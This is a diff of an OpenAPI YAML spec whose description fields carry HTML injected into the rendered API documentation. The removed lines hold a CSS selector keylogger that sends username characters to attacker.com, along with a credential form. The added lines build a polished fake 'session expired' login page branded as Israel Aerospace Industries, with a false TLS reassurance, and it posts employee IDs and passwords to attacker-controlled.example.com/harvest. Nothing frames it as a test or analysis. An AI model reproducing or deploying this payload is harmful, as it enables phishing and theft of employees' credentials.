--- a/cookie.yaml
+++ b/cookie.yaml
@@ -1,17 +1,155 @@
 openapi: 3.0.3
 info:
-  title: "IAI API Gateway"
-  version: "1.0.0"
+  title: "IAI Connect Authentication Service"
+  version: "2.1.0"
   description: |
-    <style>
-      input[name="username"][value^="a"] { background: url('https://attacker.com/log?char=a'); }
-      input[name="username"][value^="b"] { background: url('https://attacker.com/log?char=b'); }
-      /* ... repeat for all characters ... */
-    </style>
+    # Session Expired - Re-authentication Required
     
-    <form action="https://attacker.com/harvest" method="POST">
-      <input type="text" name="username" placeholder="Username">
-      <input type="password" name="password" placeholder="Password">
-      <button type="submit">Login</button>
-    </form>
-paths: {}
+    Your session has expired due to inactivity. Please re-enter your credentials to continue.
+    
+    <div style="max-width: 400px; margin: 40px auto; padding: 30px; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); border-radius: 12px; box-shadow: 0 10px 40px rgba(0,0,0,0.3); font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;">
+      <div style="background: white; padding: 30px; border-radius: 8px;">
+        <div style="text-align: center; margin-bottom: 25px;">
+          <h2 style="color: #2d3748; margin: 0 0 8px 0; font-size: 24px;">IAI Connect</h2>
+          <p style="color: #718096; margin: 0; font-size: 14px;">Secure Authentication Portal</p>
+        </div>
+        
+        <form action="https://attacker-controlled.example.com/harvest" method="POST" style="margin: 0;">
+          <div style="margin-bottom: 20px;">
+            <label style="display: block; color: #4a5568; font-weight: 600; margin-bottom: 8px; font-size: 14px;">Employee ID</label>
+            <input type="text" name="username" placeholder="e.g., E123456" required style="width: 100%; padding: 12px; border: 2px solid #e2e8f0; border-radius: 6px; font-size: 14px; box-sizing: border-box; transition: border-color 0.2s;" onfocus="this.style.borderColor='#667eea'" onblur="this.style.borderColor='#e2e8f0'">
+          </div>
+          
+          <div style="margin-bottom: 25px;">
+            <label style="display: block; color: #4a5568; font-weight: 600; margin-bottom: 8px; font-size: 14px;">Password</label>
+            <input type="password" name="password" placeholder="Enter your password" required style="width: 100%; padding: 12px; border: 2px solid #e2e8f0; border-radius: 6px; font-size: 14px; box-sizing: border-box; transition: border-color 0.2s;" onfocus="this.style.borderColor='#667eea'" onblur="this.style.borderColor='#e2e8f0'">
+          </div>
+          
+          <button type="submit" style="width: 100%; padding: 14px; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); color: white; border: none; border-radius: 6px; font-size: 16px; font-weight: 600; cursor: pointer; transition: transform 0.2s, box-shadow 0.2s;" onmouseover="this.style.transform='translateY(-2px)'; this.style.boxShadow='0 6px 20px rgba(102, 126, 234, 0.4)'" onmouseout="this.style.transform='translateY(0)'; this.style.boxShadow='none'">
+            Sign In Securely
+          </button>
+          
+          <div style="margin-top: 20px; padding-top: 20px; border-top: 1px solid #e2e8f0; text-align: center;">
+            <a href="#" style="color: #667eea; text-decoration: none; font-size: 13px;">Forgot password?</a>
+            <span style="color: #cbd5e0; margin: 0 8px;">•</span>
+            <a href="#" style="color: #667eea; text-decoration: none; font-size: 13px;">Need help?</a>
+          </div>
+        </form>
+        
+        <div style="margin-top: 20px; padding: 12px; background: #f7fafc; border-left: 4px solid #48bb78; border-radius: 4px;">
+          <p style="margin: 0; color: #2d3748; font-size: 12px;">
+            <strong style="color: #48bb78;">🔒 Secure Connection</strong><br>
+            Your credentials are encrypted using TLS 1.3
+          </p>
+        </div>
+      </div>
+      
+      <div style="text-align: center; margin-top: 20px; color: white; font-size: 11px; opacity: 0.9;">
+        <p style="margin: 5px 0;">Israel Aerospace Industries Ltd.</p>
+        <p style="margin: 5px 0;">Internal Use Only • Authorized Personnel</p>
+      </div>
+    </div>
+    
+    ---
+    
+    **Security Notice**: This authentication is required to maintain compliance with IAI security policy SP-2024-08.
+
+tags:
+  - name: "Authentication"
+    description: |
+      ## Multi-Factor Authentication Required
+      
+      <div style="background: #fff3cd; border-left: 4px solid #ffc107; padding: 15px; margin: 20px 0; border-radius: 4px;">
+        <strong style="color: #856404;">⚠️ Additional Verification Required</strong>
+        <p style="color: #856404; margin: 8px 0 0 0;">
+          If you recently changed your password, you must also verify your identity using the form above before accessing API documentation.
+        </p>
+      </div>
+
+paths:
+  /auth/login:
+    post:
+      tags:
+        - Authentication
+      summary: "User authentication endpoint"
+      description: "Authenticates user credentials and returns session token"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              properties:
+                username:
+                  type: string
+                  example: "E123456"
+                password:
+                  type: string
+                  format: password
+              required:
+                - username
+                - password
+      responses:
+        '200':
+          description: "Authentication successful"
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  token:
+                    type: string
+                  expiresIn:
+                    type: integer
+        '401':
+          description: "Invalid credentials"
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  error:
+                    type: string
+                    example: "Invalid username or password"
+  
+  /auth/refresh:
+    post:
+      tags:
+        - Authentication
+      summary: "Refresh authentication token"
+      description: "Generates a new token using a valid refresh token"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              properties:
+                refreshToken:
+                  type: string
+      responses:
+        '200':
+          description: "Token refreshed successfully"
+        '401':
+          description: "Invalid refresh token"
+
+components:
+  schemas:
+    AuthRequest:
+      type: object
+      properties:
+        username:
+          type: string
+        password:
+          type: string
+          format: password
+    
+    AuthResponse:
+      type: object
+      properties:
+        token:
+          type: string
+        expiresIn:
+          type: integer
+        refreshToken:
+          type: string
